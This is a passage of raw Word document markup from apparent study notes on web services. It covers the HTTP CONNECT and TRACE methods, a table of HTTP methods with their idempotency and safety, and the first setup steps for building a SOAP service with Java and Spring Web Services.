          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20F064" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1809"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Establishing a secure connection through an HTTP proxy for encrypted traffic (typically used with HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B31740" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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9. TRACE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268FD3E2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1810"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Performs a diagnostic trace of the request-response chain. The server returns the exact request that it received, useful for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C05293" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1810"/>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Idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2CCA90" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1810"/>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Safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063C537" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1810"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Checking for intermediate changes in the request as it travels to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E918CB8" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1810"/>
        </w:num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TRACE /api/products/123 (trace the request-response path for the product with ID 123).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D06276" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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F989C7F">
          <v:rect id="_x0000_i1983" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E06C3" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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Summary of HTTP Action Typ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3"/>
        <w:gridCol w:w="4032"/>
        <w:gridCol w:w="1145"/>
        <w:gridCol w:w="468"/>
      </w:tblGrid>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="26086657" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23361BAB" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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HTTP Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD024C4" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651F7580" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17"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Idempotent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02EBAAE9" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00585961">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="5B7754EE" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4AEC34"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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74545424"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Retrieve data from the server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="622CCD55"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BCE1137"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="1530C30B" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C02024F"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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="441F4DFE"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Submit data to create or modify resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFFD313"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14517CE3"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="45693451" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AB747C7"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PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34495B69"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Replace or update a resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D4494DF"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B102506"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="55FDEC68" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7008D8CC"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DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E71EDFE"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Delete a resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C3E1B3"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CB63AE3"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="642B1E27" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="096338BD"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PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E844DCD"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Partially update a resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A99294"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28692131"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="6F2D136A" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6530B7B3"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HEAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19043FB2"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Retrieve headers (no body)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="530C5832"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA04969"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="302AEB08" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F4EB448"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OPTIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="796701D9"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Describe available methods for a resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FBEDDE9"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58542C0E"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="4828052C" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7987527E"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CONNECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57749BA4"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Establish a tunnel for secure communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F83C3C3"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF9D9DE"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00585961" w:rsidRPr="00585961" w14:paraId="0204B105" w14:textId="77777777" w:rsidTr="008D1C17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="425B35A3"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TRACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40258116"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Perform a diagnostic trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D5FEC8"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="219C3E09"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0907C6D1" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These action types provide the basic operations that can be performed on resources through HTTP in a RESTful service or web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12A772" w14:textId="4F53BF14" w:rsidR="004F5B43" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004F5B4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D5B36D8">
          <v:rect id="_x0000_i1984" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CE2CA" w14:textId="78FD0EB5" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="004876C2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="_Toc196307886"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain how you will create a </w:t>
      </w:r>
      <w:r w:rsidR="00F81212" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SOAP web service</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
    </w:p>
    <w:p w14:paraId="0D18E344" w14:textId="25D55919" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To create a SOAP web service, you will follow these general steps. Below is an example using </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Web Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, though the process can be adapted for other technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED34D05" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps to Create a SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E7DD3" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Set Up Your Development Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DECA9" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1811"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use a Java IDE (such as IntelliJ IDEA or Eclipse) and ensure you have the following tools installed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1CBD2E" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1811"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDK (Java Development Kit) 8 or later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C924084" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1811"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maven or Gradle for dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1C147" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1811"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Tomcat or any compatible servlet container for hosting your service.</w:t>
